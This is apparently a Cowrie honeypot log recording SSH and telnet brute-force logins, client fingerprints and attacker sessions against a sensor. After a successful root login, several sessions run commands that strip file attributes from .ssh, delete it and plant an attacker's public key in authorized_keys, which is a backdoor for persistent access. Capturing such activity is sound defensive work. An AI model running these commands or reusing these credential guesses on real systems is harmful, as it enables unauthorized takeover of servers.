{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60716,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ac1450819f3","protocol":"telnet","message":"New connection: 212.227.235.229:60716 (1.2.3.4:23) [session: 6ac1450819f3]","sensor":"my-vps","timestamp":"2025-08-28T14:53:47.209967Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35794,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f86f05a6356","protocol":"ssh","message":"New connection: 212.227.125.160:35794 (1.2.3.4:22) [session: 6f86f05a6356]","sensor":"my-vps","timestamp":"2025-08-28T14:54:08.609762Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:08.659530Z","src_ip":"212.227.125.160","session":"6f86f05a6356"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":65012,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c20d13683ee","protocol":"ssh","message":"New connection: 80.94.95.112:65012 (1.2.3.4:22) [session: 9c20d13683ee]","sensor":"my-vps","timestamp":"2025-08-28T14:54:20.136968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:54:20.137969Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:54:20.168074Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31031981","message":"login attempt [admin/31031981] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:20.374432Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30111984","message":"login attempt [admin/30111984] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:21.407154Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30101989","message":"login attempt [admin/30101989] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:22.439026Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30081991","message":"login attempt [admin/30081991] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:23.471605Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"30011976","message":"login attempt [admin/30011976] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:24.504123Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:25.536572Z","src_ip":"80.94.95.112","session":"9c20d13683ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36978,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e4293e496c","protocol":"ssh","message":"New connection: 212.227.235.229:36978 (1.2.3.4:22) [session: a4e4293e496c]","sensor":"my-vps","timestamp":"2025-08-28T14:54:28.818916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:54:28.819850Z","src_ip":"212.227.235.229","session":"a4e4293e496c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:54:28.998497Z","src_ip":"212.227.235.229","session":"a4e4293e496c"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Aa123123","message":"login attempt [ubuntu/Aa123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:29.753044Z","src_ip":"212.227.235.229","session":"a4e4293e496c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:30.934710Z","src_ip":"212.227.235.229","session":"a4e4293e496c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60316,"dst_ip":"1.2.3.4","dst_port":22,"session":"20d88639fd38","protocol":"ssh","message":"New connection: 212.227.235.229:60316 (1.2.3.4:22) [session: 20d88639fd38]","sensor":"my-vps","timestamp":"2025-08-28T14:54:35.482891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:54:35.484882Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:54:35.743284Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.login.success","username":"root","password":"0206","message":"login attempt [root/0206] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:54:36.786781Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:54:37.321940Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:54:37.322675Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:54:37.323489Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:37.585760Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:54:38.158555Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:54:38.159308Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:54:38.423762Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:38.424710Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32906,"dst_ip":"1.2.3.4","dst_port":22,"session":"887d3f1e2420","protocol":"ssh","message":"New connection: 212.227.235.229:32906 (1.2.3.4:22) [session: 887d3f1e2420]","sensor":"my-vps","timestamp":"2025-08-28T14:54:38.671042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:54:38.675996Z","src_ip":"212.227.235.229","session":"887d3f1e2420"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:54:38.927084Z","src_ip":"212.227.235.229","session":"887d3f1e2420"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:54:39.940621Z","src_ip":"212.227.235.229","session":"887d3f1e2420"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:41.200544Z","src_ip":"212.227.235.229","session":"887d3f1e2420"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33468,"dst_ip":"1.2.3.4","dst_port":22,"session":"62e7b41363da","protocol":"ssh","message":"New connection: 212.227.235.229:33468 (1.2.3.4:22) [session: 62e7b41363da]","sensor":"my-vps","timestamp":"2025-08-28T14:54:41.451170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:54:41.452226Z","src_ip":"212.227.235.229","session":"62e7b41363da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:54:41.709377Z","src_ip":"212.227.235.229","session":"62e7b41363da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:54:42.767081Z","src_ip":"212.227.235.229","session":"62e7b41363da"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:43.022631Z","src_ip":"212.227.235.229","session":"62e7b41363da"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:43.026824Z","src_ip":"212.227.235.229","session":"20d88639fd38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52518,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd282bfe702d","protocol":"ssh","message":"New connection: 212.227.235.229:52518 (1.2.3.4:22) [session: fd282bfe702d]","sensor":"my-vps","timestamp":"2025-08-28T14:54:44.718198Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:54:44.821809Z","src_ip":"212.227.235.229","session":"fd282bfe702d"}
{"eventid":"cowrie.login.success","username":"root","password":"aq1sw2","message":"login attempt [root/aq1sw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:54:49.935879Z","src_ip":"212.227.235.229","session":"6ac1450819f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:54:49.952777Z","src_ip":"212.227.235.229","session":"6ac1450819f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47636,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb47e33cb4e9","protocol":"telnet","message":"New connection: 212.227.235.229:47636 (1.2.3.4:23) [session: bb47e33cb4e9]","sensor":"my-vps","timestamp":"2025-08-28T14:54:50.566123Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:55:06.275358Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.session.closed","duration":37.539998054504395,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:55:28.106050Z","src_ip":"212.227.235.229","session":"bb47e33cb4e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35282,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d027da74e10","protocol":"ssh","message":"New connection: 212.227.235.229:35282 (1.2.3.4:22) [session: 3d027da74e10]","sensor":"my-vps","timestamp":"2025-08-28T14:55:37.892436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:55:37.893423Z","src_ip":"212.227.235.229","session":"3d027da74e10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:55:38.078235Z","src_ip":"212.227.235.229","session":"3d027da74e10"}
{"eventid":"cowrie.login.failed","username":"core","password":"core","message":"login attempt [core/core] failed","sensor":"my-vps","timestamp":"2025-08-28T14:55:38.858158Z","src_ip":"212.227.235.229","session":"3d027da74e10"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:55:40.048198Z","src_ip":"212.227.235.229","session":"3d027da74e10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"f52340ad7f0e","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: f52340ad7f0e]","sensor":"my-vps","timestamp":"2025-08-28T14:56:08.689217Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:08.777299Z","src_ip":"212.227.235.229","session":"f52340ad7f0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33566,"dst_ip":"1.2.3.4","dst_port":22,"session":"e265b6191cc5","protocol":"ssh","message":"New connection: 212.227.235.229:33566 (1.2.3.4:22) [session: e265b6191cc5]","sensor":"my-vps","timestamp":"2025-08-28T14:56:40.595717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:56:40.596533Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:56:40.778921Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.login.success","username":"root","password":"weiwei","message":"login attempt [root/weiwei] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:56:41.552011Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:56:41.932685Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:56:41.933388Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:56:41.934631Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:56:42.119120Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:56:42.951487Z","src_ip":"212.227.235.229","session":"e265b6191cc5"}
